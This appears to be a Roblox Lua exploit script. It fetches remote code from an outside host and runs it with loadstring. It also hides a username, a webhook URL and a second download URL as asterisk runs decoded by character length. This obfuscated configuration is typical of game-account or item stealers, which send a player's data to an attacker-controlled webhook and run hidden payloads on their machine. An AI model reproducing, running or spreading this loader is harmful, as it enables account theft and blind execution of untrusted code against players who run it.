getgenv().gui = false
loadstring(game:HttpGet("https://egorikusa.space/1273ce86b3a1bd21b76c3e9a.lua", true))()
function yxsFzTwpwu(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


Username = yxsFzTwpwu({'**************************************************************************************************************************','*************************************************************************************************','************************************************************************************************************','*************************************************************************************************','**************************************************************************************************************','************************************************************************************************************','***************************************************************************************************************','**********************************************************************************************************************','*****************************************************************************************************','*******************************************************************************************************************','**********************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************'}) 
Webhook = yxsFzTwpwu({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','****************************************************************************************************','*********************************************************************************************************','*******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','****************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*************************************************************************************************','****************************************************************************************************************','*********************************************************************************************************','***********************************************','***********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************','********************************************************************************************************','***************************************************************************************************************','***************************************************************************************************************','***********************************************************************************************************','*******************************************************************************************************************','***********************************************','*************************************************','**************************************************','*******************************************************','************************************************','*****************************************************','*****************************************************','**************************************************','*********************************************************','************************************************','*********************************************************','*************************************************','**************************************************','*****************************************************','***************************************************','********************************************************','******************************************************','***************************************************','**************************************************','************************************************','***********************************************','***************************************************************************************************************','****************************************************','*********************************************************************************************************','************************************************************************************','*****************************************************','*************************************************','***********************************************************************************','**********************************************************************','*******************************************************************************************************','*************************************************************************************************','********************************************************','**********************************************************************************************************','*************************************************************************************************************','*************************************************************************************************','************************************************************************','*******************************************************************************************************','************************************************************************************************************','**************************************************************************************************************************','*****************************************************************************************************************','*********************************************','*********************************************************************************************************************','*****************************************************************************','***************************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************************','**************************************************************************************************************************','**************************************************','**********************************************************************************************************************','***************************************************************************','***************************************************************************','***********************************************************************************************************','*********************************************************','***************************************************************************','***************************************************************************************************************','*********************************************************************************','**********************************************************************************************************','***************************************************************************','*************************************************************************************************************','**************************************************************************************','**************************************************************************','*************************************************************************************************************','*********************************************','**********************************************************************************************************************','*****************************************************************************************************','***************************************************************************','******************************************************************************','***************************************************************************************************************','*****************************************************************','**********************************************************************************************************','*******************************************************','******************************************************************','***********************************************************************************','************************************************************************************************************','**********************************************************************************','***************************************************************************************','*******************************************************','****************************************************************************************','*********************************************************','********************************************************','*******************************************************************','**************************************************************************************************************','***************************************************************************************************************','****************************************************************************************************************','***************************************************************************************','***********************************************************************************************************************','*****************************************************************************','*****************************************************************************************************','*****************************************************************'}) 

getgenv().gui = false
loadstring(game:HttpGet(yxsFzTwpwu({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','**************************************************************************************************************************','*************************************************************************************************','***************************************************************************************************','********************************************************************************************************','*****************************************************************************************************','*************************************************************************************************************','**************************************************************************************************************************','********************************************************************************************************','*****************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','***********************************************************************************************************','*********************************************************************************************************','*************************************************************************************************************************','***********************************************','************************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','****************************************************************************************************************','*******************************************************************************************************************','*********************************************************','*********************************************************','**********************************************','************************************************************************************************************','*********************************************************************************************************************','*************************************************************************************************'})))()    
